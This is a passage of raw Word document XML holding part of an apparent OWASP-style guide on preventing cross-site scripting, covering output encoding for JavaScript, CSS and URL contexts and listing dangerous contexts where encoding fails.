          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods which will automatically HTML Attribute Encode. Those are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sinks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> as long as the attribute name is hardcoded and innocuous, like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. Generally, attributes that accept JavaScript, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>onClick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>NOT safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use with untrusted attribute values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding for “JavaScript Contexts”</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="32" w:name="_Tocgh2zmj0ut0qx"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>“JavaScript Contexts” refer to placing variables into inline JavaScript which is then embedded in an HTML document. This is commonly seen in programs that heavily use custom JavaScript embedded in their web pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The only ‘safe’ location for placing variables in JavaScript is inside a “quoted data value”. All other contexts are unsafe and you should not place variable data in them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Examples of “Quoted Data Values”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('$varUnsafe’)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;script&gt;x=’$varUnsafe’&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div onmouseover="'$varUnsafe'"&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Encode all characters using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>\xHH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> format. Encoding libraries often have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>EncodeForJavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or similar to support this function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Please look at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://owasp.org/www-project-java-encoder/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>OWASP Java Encoder JavaScript encoding examples</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> for examples of proper JavaScript use that requires minimal encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">For JSON, verify that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> header is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding for “CSS Contexts”</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="33" w:name="_Tockw2wqp1v833j"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>“CSS Contexts” refer to variables placed into inline CSS. This is common when you want users to be able to customize the look and feel of their webpages. CSS is surprisingly powerful and has been used for many types of attacks. Variables should only be placed in a CSS property value. Other “CSS Contexts” are unsafe and you should not place variable data in them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;style&gt; selector { property : $varUnsafe; } &lt;/style&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;style&gt; selector { property : "$varUnsafe"; } &lt;/style&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;span style="property : $varUnsafe"&gt;Oh no&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're using JavaScript to change a CSS property, look into using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>style.property = x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will automatically CSS encode data in it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>// Add CSS Encoding Advice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding for “URL Contexts”</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="34" w:name="_Tocd1gukb6pdq8p"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>“URL Contexts” refer to variables placed into a URL. Most commonly, a developer will add a parameter or URL fragment to a URL base that is then displayed or used in some operation. Use URL Encoding for these scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;a href="http://www.owasp.org?test=$varUnsafe"&gt;link&lt;/a &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Encode all characters with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>%HH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding format. Make sure any attributes are fully quoted, same as JS and CSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Common Mistake</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="35" w:name="_Tocbnh1bohi0ka4"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>There will be situations where you use a URL in different contexts. The most common one would be adding it to an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute of an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;a&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag. In these scenarios, you should do URL encoding, followed by HTML attribute encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>url = "https://site.com?data=" + urlencode(parameter)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;a href='attributeEncode(url)'&gt;link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're using JavaScript to construct a URL Query Value, look into using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>window.encodeURIComponent(x)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will automatically URL encode data in it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Dangerous Contexts</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="36" w:name="_Tocn45xak6lvhzg"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoding is not perfect. It will not always prevent XSS. These locations are known as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>dangerous contexts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. Dangerous contexts include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;script&gt;Directly in a script&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;!-- Inside an HTML comment --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;style&gt;Directly in CSS&lt;/style&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div ToDefineAnAttribute=test /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;ToDefineATag href="/test" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Other areas to be careful of include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
